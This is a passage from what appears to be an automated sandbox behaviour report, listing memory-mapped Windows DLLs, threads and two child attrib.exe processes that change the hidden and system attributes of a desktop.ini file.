0x6ebe0000 end_va = 0x6ebe9fff entry_point = 0x6ebe0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 33366 start_va = 0x6ebf0000 end_va = 0x6ec07fff entry_point = 0x6ebf0000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 33367 start_va = 0x6ec10000 end_va = 0x6eca5fff entry_point = 0x6ec10000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 33368 start_va = 0x6ef00000 end_va = 0x6ef0efff entry_point = 0x6ef00000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 33369 start_va = 0x6f7c0000 end_va = 0x6f81bfff entry_point = 0x6f7c0000 region_type = mapped_file name = "wbemcomn.dll" filename = 
"\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 33370 start_va = 0x73670000 end_va = 0x73681fff entry_point = 0x73670000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 33371 start_va = 0x73690000 end_va = 0x7369cfff entry_point = 0x73690000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 33372 start_va = 0x73720000 end_va = 0x73750fff entry_point = 0x73720000 region_type = mapped_file name = "dhcpcore6.dll" filename = "\\Windows\\System32\\dhcpcore6.dll" (normalized: "c:\\windows\\system32\\dhcpcore6.dll") Region: id = 33373 start_va = 0x73760000 end_va = 0x7379ffff entry_point = 0x73760000 region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll") Region: id = 33374 start_va = 0x737b0000 end_va = 0x737b5fff entry_point = 0x737b0000 region_type = mapped_file name = "nrpsrv.dll" filename = "\\Windows\\System32\\nrpsrv.dll" (normalized: "c:\\windows\\system32\\nrpsrv.dll") Region: id = 33375 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 33376 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 33377 start_va = 0x737f0000 end_va = 0x737f7fff entry_point = 0x737f0000 region_type = mapped_file name = "lmhsvc.dll" filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll") Region: id = 33378 start_va = 0x73b40000 end_va = 
0x73b46fff entry_point = 0x73b40000 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 33379 start_va = 0x73b50000 end_va = 0x73b74fff entry_point = 0x73b50000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 33380 start_va = 0x73b80000 end_va = 0x73bf9fff entry_point = 0x73b80000 region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll") Region: id = 33381 start_va = 0x73c00000 end_va = 0x73c20fff entry_point = 0x73c00000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 33382 start_va = 0x73c40000 end_va = 0x73c4efff entry_point = 0x73c40000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 33383 start_va = 0x73c50000 end_va = 0x73c58fff entry_point = 0x73c50000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 33384 start_va = 0x73cc0000 end_va = 0x73cc2fff entry_point = 0x73cc0000 region_type = mapped_file name = "winmgmtr.dll" filename = "\\Windows\\System32\\wbem\\WinMgmtR.dll" (normalized: "c:\\windows\\system32\\wbem\\winmgmtr.dll") Region: id = 33385 start_va = 0x73ed0000 end_va = 0x73f08fff entry_point = 0x73ed0000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 33386 start_va = 0x74220000 end_va = 0x74314fff entry_point = 0x74220000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: 
"c:\\windows\\system32\\propsys.dll") Region: id = 33387 start_va = 0x747c0000 end_va = 0x748cbfff entry_point = 0x747c0000 region_type = mapped_file name = "wevtsvc.dll" filename = "\\Windows\\System32\\wevtsvc.dll" (normalized: "c:\\windows\\system32\\wevtsvc.dll") Region: id = 33388 start_va = 0x748d0000 end_va = 0x748d8fff entry_point = 0x748d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 33389 start_va = 0x748e0000 end_va = 0x74955fff entry_point = 0x748e0000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 33390 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 33391 start_va = 0x74a10000 end_va = 0x74a25fff entry_point = 0x74a10000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 33392 start_va = 0x74a30000 end_va = 0x74a46fff entry_point = 0x74a30000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 33393 start_va = 0x74b20000 end_va = 0x74b27fff entry_point = 0x74b20000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 33394 start_va = 0x74bf0000 end_va = 0x74c2afff entry_point = 0x74bf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 33395 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file 
name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 33396 start_va = 0x74e00000 end_va = 0x74e05fff entry_point = 0x74e00000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 33397 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 33398 start_va = 0x74e50000 end_va = 0x74e65fff entry_point = 0x74e50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 33399 start_va = 0x75010000 end_va = 0x75051fff entry_point = 0x75010000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 33400 start_va = 0x75290000 end_va = 0x75297fff entry_point = 0x75290000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 33401 start_va = 0x752b0000 end_va = 0x752cafff entry_point = 0x752b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 33402 start_va = 0x752d0000 end_va = 0x752dbfff entry_point = 0x752d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 33403 start_va = 0x75340000 end_va = 0x75368fff entry_point = 0x75340000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 33404 start_va = 0x75370000 
end_va = 0x7537dfff entry_point = 0x75370000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 33405 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 33406 start_va = 0x753f0000 end_va = 0x753fbfff entry_point = 0x753f0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 33407 start_va = 0x75400000 end_va = 0x75411fff entry_point = 0x75400000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 33408 start_va = 0x75420000 end_va = 0x7553cfff entry_point = 0x75420000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 33409 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33410 start_va = 0x75590000 end_va = 0x755b6fff entry_point = 0x75590000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 33411 start_va = 0x75650000 end_va = 0x7567cfff entry_point = 0x75650000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 33412 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" 
(normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 33413 start_va = 0x75730000 end_va = 0x75774fff entry_point = 0x75730000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 33414 start_va = 0x75780000 end_va = 0x75802fff entry_point = 0x75780000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 33415 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 33416 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33417 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33418 start_va = 0x764b0000 end_va = 0x7664cfff entry_point = 0x764b0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 33419 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 33420 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33421 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" 
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 33422 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33423 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33424 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 33425 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33426 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33427 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 33428 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 33429 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 33430 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 
0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 33431 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33432 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 33433 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33434 start_va = 0x7ffa4000 end_va = 0x7ffa4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa4000" filename = "" Region: id = 33435 start_va = 0x7ffa5000 end_va = 0x7ffa5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa5000" filename = "" Region: id = 33436 start_va = 0x7ffa6000 end_va = 0x7ffa6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa6000" filename = "" Region: id = 33437 start_va = 0x7ffa7000 end_va = 0x7ffa7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa7000" filename = "" Region: id = 33438 start_va = 0x7ffa9000 end_va = 0x7ffa9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa9000" filename = "" Region: id = 33439 start_va = 0x7ffac000 end_va = 0x7ffacfff entry_point = 0x0 region_type = private name = "private_0x000000007ffac000" filename = "" Region: id = 33440 start_va = 0x7ffad000 end_va = 0x7ffadfff entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Region: id = 33441 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: 
id = 33442 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 33443 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 33444 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 33445 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 33446 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 33447 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 33448 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 33449 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 33450 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 33451 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 33452 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 33453 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 33454 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 33455 start_va = 
0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Thread: id = 786 os_tid = 0xab4 Thread: id = 787 os_tid = 0xa30 Thread: id = 788 os_tid = 0xa2c Thread: id = 789 os_tid = 0x6c4 Thread: id = 790 os_tid = 0x260 Thread: id = 791 os_tid = 0x5cc Thread: id = 792 os_tid = 0x14c Thread: id = 793 os_tid = 0x2b0 Thread: id = 794 os_tid = 0x438 Thread: id = 795 os_tid = 0x434 Thread: id = 796 os_tid = 0x3b0 Thread: id = 797 os_tid = 0x3a8 Thread: id = 798 os_tid = 0x398 Thread: id = 799 os_tid = 0x348 Thread: id = 800 os_tid = 0x344 Thread: id = 801 os_tid = 0x340 Thread: id = 802 os_tid = 0x2f8 Thread: id = 803 os_tid = 0x2f4 Thread: id = 804 os_tid = 0x2d0 Thread: id = 805 os_tid = 0x2c8 Thread: id = 897 os_tid = 0xaa4 Thread: id = 937 os_tid = 0xde0 Process: id = "583" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16860" os_pid = "0xd2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "581" os_parent_pid = "0x6bc" cmd_line = "attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 33457 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 33458 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 33459 start_va = 0x40000 end_va = 0x40fff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 33460 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 33461 start_va = 0xfa0000 end_va = 0xfa6fff entry_point = 0xfa0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 33462 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 33463 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 33464 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 33465 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 33466 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33467 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33468 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33469 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33470 start_va = 0x220000 end_va = 0x22ffff entry_point = 0x0 region_type = 
private name = "private_0x0000000000220000" filename = "" Region: id = 33471 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 33472 start_va = 0x71e30000 end_va = 0x71e4cfff entry_point = 0x71e30000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 33473 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33474 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 33475 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33476 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33477 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 33478 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33479 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: 
"c:\\windows\\system32\\user32.dll") Region: id = 33480 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33481 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 33482 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33483 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33484 start_va = 0x100000 end_va = 0x1c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 33485 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33486 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 807 os_tid = 0xd10 Process: id = "584" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16780" os_pid = "0xd8c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "581" os_parent_pid = "0x6bc" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], 
"BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 33487 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 33488 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 33489 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 33490 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 33491 start_va = 0x2f0000 end_va = 0x2f6fff entry_point = 0x2f0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 33492 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 33493 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 33494 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 33495 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 33496 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 
